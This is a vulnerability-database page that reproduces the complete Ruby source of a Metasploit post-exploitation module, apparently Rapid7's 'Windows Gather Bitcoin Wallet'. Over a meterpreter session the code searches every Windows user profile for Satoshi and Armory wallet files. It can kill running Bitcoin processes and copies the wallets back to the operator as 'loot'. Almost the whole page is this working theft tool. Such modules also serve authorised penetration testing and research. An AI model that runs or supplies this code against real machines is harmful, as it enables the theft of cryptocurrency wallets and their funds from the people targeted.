Lucene search
K

Windows Gather Bitcoin Wallet

🗓️ 21 Jun 2011 03:26:07Reported by illwill <[email protected]>, todb <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 67 Views

This module downloads Bitcoin wallet files from the target system, supporting both classic Satoshi wallets and more recent Armory wallets

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Bitcoin Wallet',
        'Description' => %q{
          This module downloads any Bitcoin wallet files from the target
          system. It currently supports both the classic Satoshi wallet and the
          more recent Armory wallets. Note that Satoshi wallets tend to be
          unencrypted by default, while Armory wallets tend to be encrypted by default.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'illwill <illwill[at]illmob.org>', # Original implementation
          'todb' # Added Armory support
        ],
        'Platform' => [ 'win' ], # TODO: Several more platforms host Bitcoin wallets...
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_get_processes
              stdapi_sys_process_kill
            ]
          }
        }
      )
    )

    register_options([
      OptBool.new('KILL_PROCESSES', [false, 'Kill associated Bitcoin processes before jacking.', false]),
    ])
  end

  def run
    print_status('Checking all user profiles for Bitcoin wallets...')
    found_wallets = false
    grab_user_profiles.each do |user|
      next unless user['AppData']

      bitcoin_wallet_path = user['AppData'] + '\\Bitcoin\\wallet.dat'
      next unless file?(bitcoin_wallet_path)

      found_wallets = true
      jack_wallet(bitcoin_wallet_path)
      armory_wallet_path = user['AppData'] + '\\Armory'
      session.fs.dir.foreach(armory_wallet_path) do |fname|
        next unless fname =~ /\.wallet/

        found_wallets = true
        armory_wallet_fullpath = armory_wallet_path + "\\#{fname}"
        jack_wallet(armory_wallet_fullpath)
      end
    end
    unless found_wallets
      print_warning 'No wallets found, nothing to do.'
    end
  end

  def jack_wallet(wallet_path)
    data = ''
    wallet_type = case wallet_path
                  when /\.wallet$/
                    :armory
                  when /wallet\.dat$/
                    :satoshi
                  else
                    :unknown
                  end

    if wallet_type == :unknown
      print_error "Unknown wallet type: #{wallet_path}, nothing to do."
      return
    end

    print_status("#{wallet_type.to_s.capitalize} Wallet found at #{wallet_path}")
    print_status("Jackin' wallet...")

    kill_bitcoin_processes if datastore['KILL_PROCESSES']

    begin
      data = read_file(wallet_path) || ''
    rescue ::Exception => e
      print_error("Failed to download #{wallet_path}: #{e.class} #{e}")
      return
    end

    if data.empty?
      print_error('No data found, nothing to save.')
    else
      loot_result = store_loot(
        "bitcoin.wallet.#{wallet_type}",
        'application/octet-stream',
        session,
        data,
        wallet_path,
        "Bitcoin Wallet (#{wallet_type.to_s.capitalize})"
      )
      print_status("Wallet jacked: #{loot_result}")
    end
  end

  def kill_bitcoin_processes
    client.sys.process.get_processes.each do |process|
      pname = process['name'].downcase
      next unless pname == 'bitcoin.exe' || pname == 'bitcoind.exe' || pname == 'armoryqt.exe'

      print_status("#{process['name']} Process Found...")
      print_status("Killing Process ID #{process['pid']}...")
      session.sys.process.kill(process['pid'])
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation